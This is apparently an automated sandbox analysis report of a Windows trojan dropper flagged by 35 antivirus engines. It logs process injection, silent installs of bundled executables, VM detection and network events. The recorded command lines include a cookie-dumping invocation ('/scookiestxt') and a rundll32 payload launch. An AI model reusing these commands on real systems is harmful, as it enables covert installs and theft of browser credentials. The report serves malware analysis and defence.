file	C:\Users\test22\AppData\Local\Temp\$inst\13.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\17.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\10.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\21.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\3.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\16.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\9.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\2.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\50.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\1.tmp

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3468 resumed a thread in remote process 1912
NtResumeThread May 23, 2021, 10:28 a.m.	thread_handle: 0x0000028c suspend_count: 1 process_identifier: 1912	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu

Tries to unhook Windows functions monitored by Cuckoo (1 event)

Time & API	Arguments	Status	Return	Repeated
__anomaly__ May 23, 2021, 10:28 a.m.	tid: 5096 message: Encountered 65537 exceptions, quitting. subcategory: exception function_name:	1	0	0

Detects VMWare through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.

Zeus P2P (Banking Trojan) (16 events)

mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0002
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0001
mutex	Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000
mutex	{08586C4E-62C4-4a4e-8271-C2A20530AF62}_M_S-1-5-21-3832866432-4053218753-3017428901-1001
udp	{u'src': u'198.13.62.186', u'dst': u'192.168.56.102', u'offset': 974142, u'time': 11.00086498260498, u'dport': 61999, u'sport': 53}
udp	{u'src': u'192.168.56.102', u'dst': u'239.255.255.250', u'offset': 10818643, u'time': 3.819638967514038, u'dport': 3702, u'sport': 49152}
udp	{u'src': u'192.168.56.102', u'dst': u'239.255.255.250', u'offset': 10827043, u'time': 4.187895059585571, u'dport': 1900, u'sport': 56752}
udp	{u'src': u'192.168.56.102', u'dst': u'239.255.255.250', u'offset': 10832779, u'time': 4.554933071136475, u'dport': 3702, u'sport': 56754}
udp	{u'src': u'192.168.56.102', u'dst': u'239.255.255.250', u'offset': 10835507, u'time': 11.19348692893982, u'dport': 3702, u'sport': 62000}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.102', u'offset': 11048044, u'time': 103.9480710029602, u'dport': 51543, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.102', u'offset': 11048240, u'time': 82.07010102272034, u'dport': 55992, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.102', u'offset': 11048432, u'time': 95.69711089134216, u'dport': 56977, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.102', u'offset': 11048620, u'time': 113.3277108669281, u'dport': 57504, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.102', u'offset': 11048816, u'time': 82.68904304504395, u'dport': 62388, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.102', u'offset': 11049010, u'time': 150.49775791168213, u'dport': 63956, u'sport': 53}

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (50 out of 398 events)

Time & API	Arguments	Status	Return
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 3324	1	0
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 7724 thread_handle: 0x00000290 process_identifier: 3172 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe" filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000298	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 5096 thread_handle: 0x00000290 process_identifier: 7232 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000284	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 5540 thread_handle: 0x00000298 process_identifier: 4372 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe" filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000029c	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 8728 thread_handle: 0x00000290 process_identifier: 8956 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 6012 thread_handle: 0x00000298 process_identifier: 7072 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe" filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000284	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 3752 thread_handle: 0x00000290 process_identifier: 4980 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe" filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000029c	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 8400 thread_handle: 0x00000298 process_identifier: 7940 current_directory: C:\Program Files (x86)\Data Finder\Versium Research\ filepath: C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe track: 1 command_line: "C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe" /Verysilent filepath_r: C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x000000a8 suspend_count: 1 process_identifier: 3172	1	0
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 9024 thread_handle: 0x00000070 process_identifier: 3724 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000010c	1	1
CreateProcessInternalW May 23, 2021, 10:28 a.m.	thread_identifier: 9156 thread_handle: 0x0000010c process_identifier: 8908 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000110	1	1
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 4372	1	0
NtGetContextThread May 23, 2021, 10:20 a.m.	thread_handle: 0x00000000000000c8	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x00000000000000c8 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x00000000000001fc suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218 suspend_count: 1 process_identifier: 4372	1	0
NtGetContextThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218	1	0
NtGetContextThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218 suspend_count: 1 process_identifier: 4372	1	0
NtGetContextThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218	1	0
NtGetContextThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000218 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000234 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000248 suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x000000000000039c suspend_count: 1 process_identifier: 4372	1	0
NtResumeThread May 23, 2021, 10:21 a.m.	thread_handle: 0x0000000000000614 suspend_count: 1 process_identifier: 4372	1	0
CreateProcessInternalW May 23, 2021, 10:22 a.m.	thread_identifier: 8840 thread_handle: 0x0000000000000710 process_identifier: 560 current_directory: C:\Program Files (x86)\Data Finder\Versium Research filepath: C:\Users\test22\AppData\Roaming\5931879.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\5931879.exe" filepath_r: C:\Users\test22\AppData\Roaming\5931879.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000718	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 6980 thread_handle: 0x000003e8 process_identifier: 1892 current_directory: C:\Program Files (x86)\Data Finder\Versium Research filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\test22\AppData\Local\Temp\install.dll",install filepath_r: C:\Windows\system32\rUNdlL32.eXe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e0	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 8084 thread_handle: 0x000000d0 process_identifier: 7664 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-HLUV2.tmp\LabPicV3.tmp" /SL5="$5603FE,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 4120 thread_handle: 0x000000d0 process_identifier: 4368 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-OI7OR.tmp\lylal220.tmp" /SL5="$8602BC,237286,153600,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 4004 thread_handle: 0x000000d0 process_identifier: 6744 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-T3D23.tmp\Versium.tmp" /SL5="$790248,138429,56832,C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe" /Verysilent filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 7664	1	0
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 3632 thread_handle: 0x00000330 process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\3316505.exe" /S /UID=lab214 filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x00000334	1	1
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 6744	1	0
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x00000570 suspend_count: 1 process_identifier: 6744	1	0
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x00000584 suspend_count: 1 process_identifier: 6744	1	0
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 6660 thread_handle: 0x00000650 process_identifier: 3468 current_directory: C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\ filepath: C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe" /Verysilent filepath_r: C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000658	1	1
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 4368	1	0
CreateProcessInternalW May 23, 2021, 10:27 a.m.	thread_identifier: 4168 thread_handle: 0x0000032c process_identifier: 7804 current_directory: C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\4_177039.exe" /S /UID=lylal220 filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x00000330	1	1
NtResumeThread May 23, 2021, 10:27 a.m.	thread_handle: 0x00000160 suspend_count: 1 process_identifier: 1892	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000148 suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000248 suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread May 23, 2021, 10:20 a.m.	thread_handle: 0x0000000000000358 suspend_count: 1 process_identifier: 2736	1	0
CreateProcessInternalW May 23, 2021, 10:21 a.m.	thread_identifier: 3592 thread_handle: 0x000000000000066c process_identifier: 6876 current_directory: C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp filepath: C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe track: 1 command_line: "C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe" /VERYSILENT filepath_r: C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000670	1	1
CreateProcessInternalW May 23, 2021, 10:21 a.m.	thread_identifier: 3824 thread_handle: 0x00000000000006dc process_identifier: 5424 current_directory: C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp filepath: C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000006d0	1	1
CreateProcessInternalW May 23, 2021, 10:21 a.m.	thread_identifier: 1308 thread_handle: 0x00000000000006dc process_identifier: 8836 current_directory: C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp filepath: C:\Users\test22\AppData\Local\Temp\89-c69b5-0b0-9d9b4-f8e2a18de3e26\Syruzhulyso.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\89-c69b5-0b0-9d9b4-f8e2a18de3e26\Syruzhulyso.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\89-c69b5-0b0-9d9b4-f8e2a18de3e26\Syruzhulyso.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000006cc	1	1

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

DrWeb	Trojan.Inject4.11771
MicroWorld-eScan	Gen:Variant.Midie.88588
CAT-QuickHeal	Trojan.Fabookie
Cylance	Unsafe
K7AntiVirus	Trojan ( 005723511 )
K7GW	Trojan ( 005723511 )
CrowdStrike	win/malicious_confidence_80% (W)
Cyren	W32/Trojan.BXBK-4580
ESET-NOD32	multiple detections
APEX	Malicious
Avast	Win32:Trojan-gen
ClamAV	Win.Malware.Fabookie-9797757-0
Kaspersky	Trojan.Win32.Fabookie.ug
BitDefender	Gen:Variant.Midie.88588
NANO-Antivirus	Trojan.Win32.Fabookie.ivkpkm
Ad-Aware	Gen:Variant.Midie.88588
Emsisoft	Gen:Variant.Midie.88588 (B)
FireEye	Gen:Variant.Midie.88588
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Crypt
eGambit	Unsafe.AI_Score_99%
Avira	HEUR/AGEN.1139112
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	Trojan.Win32.Fabookie.ug
GData	Gen:Variant.Midie.88588
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C4477121
ALYac	Gen:Variant.Midie.88588
MAX	malware (ai score=87)
VBA32	Trojan.Fabookie
Malwarebytes	Malware.AI.2628208216
Rising	Trojan.Injector!8.C4 (CLOUD)
MaxSecure	Trojan-Ransom.Win32.Crypmod.zfq
AVG	Win32:Trojan-gen
Cybereason	malicious.6dfc64

Setup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All